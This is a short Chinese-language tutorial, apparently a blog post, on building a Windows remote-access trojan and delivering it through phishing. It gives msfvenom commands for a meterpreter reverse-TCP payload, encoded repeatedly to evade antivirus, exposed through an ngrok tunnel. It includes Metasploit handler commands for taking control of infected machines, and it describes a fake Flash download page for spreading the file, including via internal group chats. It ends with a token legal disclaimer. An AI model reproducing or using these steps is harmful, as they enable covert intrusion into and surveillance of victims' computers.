条件
- 一个外网服务器(这里用免费的ngrok)
- Metasploit(生成木马)
- Kali(映射端口)
工具下载
ngrok下载地址
https://www.ngrok.cc/#down-client
生成木马开始
1、在ngrok官网上注册一个用户然后登陆,选择一个免费/付费隧道,然后选择tcp协议

2、然后打开sunny(在工具下载那里)
在kali下输入
1 | ./sunny clientid 隧道id |
然后是这样的

打马赛克部分是我的外网的监听服务器
3、生成木马
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.241 LPORT=6 -f exe -i 12 > Fuck.exe |
-p:选择攻击的payloadLHOST:监听的本地IPLPORT:监听的本地端口-f:表示为exe程序-i:重复编码12次(听说有助于免杀)
然后就会生成一个Fuck.exe的文件

4、使用msf监听
1 | msf5 > use exploit/multi/handler |
2 | msf5 exploit(multi/handler) > set payloads windows/meterpreter/reverset_tcp |
3 | payloads => windows/meterpreter/reverset_tcp |
4 | msf5 exploit(multi/handler) > set lhost 192.168.31.241 |
5 | lhost => 192.168.31.241 |
6 | msf5 exploit(multi/handler) > set lport 6 |
7 | lport => 6 |
8 | msf5 exploit(multi/handler) > exploit |

然后在window下打开Fuck.exe后,Kali会返回如下界面(meterpreter)

这个时候已经可以监控打开这个exe文件的电脑了。
Flash钓鱼
钓鱼页面下载页:https://github.com/r00tSe7en/Fake-flash.cn
打开index.html,修改如下为你木马的下载地址

然后打开页面点击就会跳转到https://www.xxxxxxxxxxxxxx.cn/。

利用条件可以如下:
xss打不到cookie的时候,可以填写跳转到这里。- 收集信息到位,挖到一个
url跳转,然后丢到他们内部群里。
以上条件纯属虚构,如违法立删… …